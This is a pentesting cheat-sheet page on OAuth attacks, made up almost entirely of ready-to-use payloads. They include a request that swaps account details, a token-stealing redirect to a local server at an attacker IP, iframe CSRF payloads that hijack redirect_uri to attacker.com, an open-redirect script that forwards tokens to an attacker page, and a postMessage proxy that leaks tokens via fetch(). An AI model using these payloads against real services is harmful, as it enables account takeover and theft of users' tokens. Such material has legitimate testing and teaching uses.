Exploit Notes

OAuth Attack

Last modified: 2022-12-01

Web

Change User Info

POST /authenticate HTTP/1.1
...

{
    "email":"victim@example.com",
    "username":"attacker",
    "token":"b7Gl7Xoy..."
}

Steal Tokens

  1. Open Web Server in Your Local Machine

    python3 -m http.server 8000
    
  2. Inject Your Local URL to the Redirect URL

    Access to the URL below.

    https://vulnerable.com/oauth?redirect_url=http://<attacker-ip>:8000/login&response_type=token&scope=all
    

CSRF

  1. Steal Code

    <iframe src="https://vulnerable.com/oauth-linking?code=kZ7bfFa..."></iframe>
    
  2. Hijack redirect_url

    <iframe src="https://vulnerable.com/auth?client_id=ysdj...&redirect_uri=https://attacker.com&response_type=code&scope=openid%20profile%20email">
    </iframe>
    
  3. Open Redirect

    <script>
        if (!document.location.hash) {
            window.location = 'https://vulnerable.com/auth?client_id=7Fdx8a...&redirect_uri=https://vulnerable.com/oauth-callback/../post/next?path=https://attacker.com/exploit/&response_type=token&nonce=398...&scope=openid%20profile%20email'
        } else {
            window.location = '/?'+document.location.hash.substr(1)
        }
    </script>
    
  4. Proxy Page (postMessage)

    <iframe src="https://vulnerable.com/auth?client_id=iknf...&redirect_uri=https://vulnerable.com/oauth-callback/../post/comment/comment-form&response_type=token&nonce=-118...&scope=openid%20profile%20email"></iframe>
    <script>
        window.addEventListener('message', e => {
            fetch("/" + encodeURIComponent(e.data.data));
        }, false);
    </script>
    

Tools by HDKS

Fuzzagotchi

Automatic web fuzzer.

aut0rec0n

Auto reconnaissance CLI.

Hash Cracker

Hash identifier.